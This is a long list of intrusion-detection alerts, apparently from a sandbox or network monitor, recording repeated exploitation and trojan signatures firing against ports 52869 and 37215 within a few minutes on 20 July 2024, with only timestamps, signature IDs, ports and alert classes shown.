                      Timestamp:07/20/24-23:06:01.480449
                      SID:2025132
                      Source Port:51664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2829579
                      Source Port:35132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:40496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2831300
                      Source Port:55812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2831300
                      Source Port:42466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.025297
                      SID:2025132
                      Source Port:56408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.230869
                      SID:2027339
                      Source Port:59134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.283476
                      SID:2027339
                      Source Port:55196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:41340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2835222
                      Source Port:39360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.994984
                      SID:2027339
                      Source Port:49334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.571848
                      SID:2831300
                      Source Port:54914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.034294
                      SID:2027339
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2831300
                      Source Port:52034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.459249
                      SID:2027339
                      Source Port:39526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:54386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.395251
                      SID:2027339
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2027339
                      Source Port:58194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.784686
                      SID:2025132
                      Source Port:43814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.469685
                      SID:2831300
                      Source Port:54866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2027339
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.116912
                      SID:2027339
                      Source Port:51176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.325754
                      SID:2835222
                      Source Port:54136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2829579
                      Source Port:40386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2835222
                      Source Port:54726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.486746
                      SID:2027339
                      Source Port:46426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.091191
                      SID:2027339
                      Source Port:54284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.547888
                      SID:2025132
                      Source Port:56056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.198211
                      SID:2027339
                      Source Port:38518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2027339
                      Source Port:58546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.097390
                      SID:2025132
                      Source Port:54420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.610183
                      SID:2027339
                      Source Port:37576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.577230
                      SID:2025132
                      Source Port:41956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.111519
                      SID:2831300
                      Source Port:39046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2025132
                      Source Port:36984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2027339
                      Source Port:57690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.839791
                      SID:2025132
                      Source Port:47298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2027339
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2829579
                      Source Port:53148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2027339
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2829579
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2027339
                      Source Port:32996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.860933
                      SID:2025132
                      Source Port:47730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:35856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.368197
                      SID:2831300
                      Source Port:58826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2025132
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2835222
                      Source Port:52088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2835222
                      Source Port:39986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.586892
                      SID:2831300
                      Source Port:54024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2829579
                      Source Port:33238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176055
                      SID:2027339
                      Source Port:45692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.212762
                      SID:2831300
                      Source Port:56042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2831300
                      Source Port:35384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.404197
                      SID:2027339
                      Source Port:36786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2835222
                      Source Port:33908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.126981
                      SID:2027339
                      Source Port:41828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2831300
                      Source Port:49088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2027339
                      Source Port:38652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2831300
                      Source Port:55322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:39.662031
                      SID:2831300
                      Source Port:49906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.680095
                      SID:2027339
                      Source Port:58684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:46540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.602106
                      SID:2027339
                      Source Port:38998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:43394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2025132
                      Source Port:37444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.796614
                      SID:2027339
                      Source Port:49268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2829579
                      Source Port:50780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2027339
                      Source Port:48554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.589626
                      SID:2027339
                      Source Port:35704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827264
                      SID:2027339
                      Source Port:41344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2025132
                      Source Port:45750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.809385
                      SID:2831300
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.798059
                      SID:2025132
                      Source Port:43562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2025132
                      Source Port:49752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.052390
                      SID:2025132
                      Source Port:34236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:60438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2831300
                      Source Port:38404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.711626
                      SID:2831300
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2027339
                      Source Port:36078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.236975
                      SID:2025132
                      Source Port:54390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.490951
                      SID:2025132
                      Source Port:54288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.006516
                      SID:2027339
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.400253
                      SID:2027339
                      Source Port:47724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2027339
                      Source Port:45740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.273796
                      SID:2027339
                      Source Port:55738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.219605
                      SID:2027339
                      Source Port:53562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2027339
                      Source Port:34978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2027339
                      Source Port:38184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2027339
                      Source Port:54098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017538
                      SID:2027339
                      Source Port:46932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.472267
                      SID:2831300
                      Source Port:55548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:49244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.893376
                      SID:2025132
                      Source Port:55072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.264109
                      SID:2025132
                      Source Port:49012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.764775
                      SID:2027339
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.549013
                      SID:2025132
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2027339
                      Source Port:45742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2025132
                      Source Port:36416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:22.140723
                      SID:2027339
                      Source Port:33926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:33104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2027339
                      Source Port:35456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2831300
                      Source Port:57516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.805828
                      SID:2835222
                      Source Port:38814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.518664
                      SID:2027339
                      Source Port:43922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.067283
                      SID:2027339
                      Source Port:51144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2025132
                      Source Port:54486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.345455
                      SID:2027339
                      Source Port:43194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.221707
                      SID:2027339
                      Source Port:59748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.997851
                      SID:2025132
                      Source Port:37896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.200464
                      SID:2027339
                      Source Port:54646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2831300
                      Source Port:57388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.447614
                      SID:2027339
                      Source Port:42306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2027339
                      Source Port:37704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2027339
                      Source Port:44690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:47038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2027339
                      Source Port:52992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2027339
                      Source Port:35480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:43862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2027339
                      Source Port:37808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.954678
                      SID:2025132
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2025132
                      Source Port:39326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2025132
                      Source Port:34610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2831300
                      Source Port:36470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.144517
                      SID:2027339
                      Source Port:56320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2025132
                      Source Port:34120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.279109
                      SID:2025132
                      Source Port:53060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:40292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2027339
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.193478
                      SID:2025132
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2829579
                      Source Port:37440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2027339
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.468942
                      SID:2831300
                      Source Port:53194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.253380
                      SID:2027339
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404139
                      SID:2025132
                      Source Port:56070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2027339
                      Source Port:44274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.513568
                      SID:2829579
                      Source Port:42618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2025132
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.313345
                      SID:2025132
                      Source Port:44510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2027339
                      Source Port:55530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2835222
                      Source Port:57382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.015066
                      SID:2027339
                      Source Port:42980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2027339
                      Source Port:34092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.225562
                      SID:2025132
                      Source Port:57654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2829579
                      Source Port:46748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.459661
                      SID:2025132
                      Source Port:48112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.699827
                      SID:2025132
                      Source Port:60816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.778623
                      SID:2027339
                      Source Port:50610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2829579
                      Source Port:40050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2025132
                      Source Port:46676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2025132
                      Source Port:39678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.508652
                      SID:2027339
                      Source Port:40980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2027339
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.003073
                      SID:2025132
                      Source Port:49854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.906932
                      SID:2831300
                      Source Port:51350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.055543
                      SID:2027339
                      Source Port:59520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.631980
                      SID:2027339
                      Source Port:48926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.444049
                      SID:2831300
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:59104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.169432
                      SID:2027339
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2027339
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.187277
                      SID:2027339
                      Source Port:36610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.327962
                      SID:2025132
                      Source Port:47748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.379204
                      SID:2027339
                      Source Port:55090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:53598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:57314
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2027339
                      Source Port:55254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2027339
                      Source Port:35080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2027339
                      Source Port:54008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.281029
                      SID:2027339
                      Source Port:44108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.139088
                      SID:2027339
                      Source Port:43540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2027339
                      Source Port:34704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.169080
                      SID:2831300
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.148043
                      SID:2025132
                      Source Port:60698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.223056
                      SID:2025132
                      Source Port:38304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2835222
                      Source Port:60696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.418921
                      SID:2025132
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:33940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2027339
                      Source Port:56352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470290
                      SID:2027339
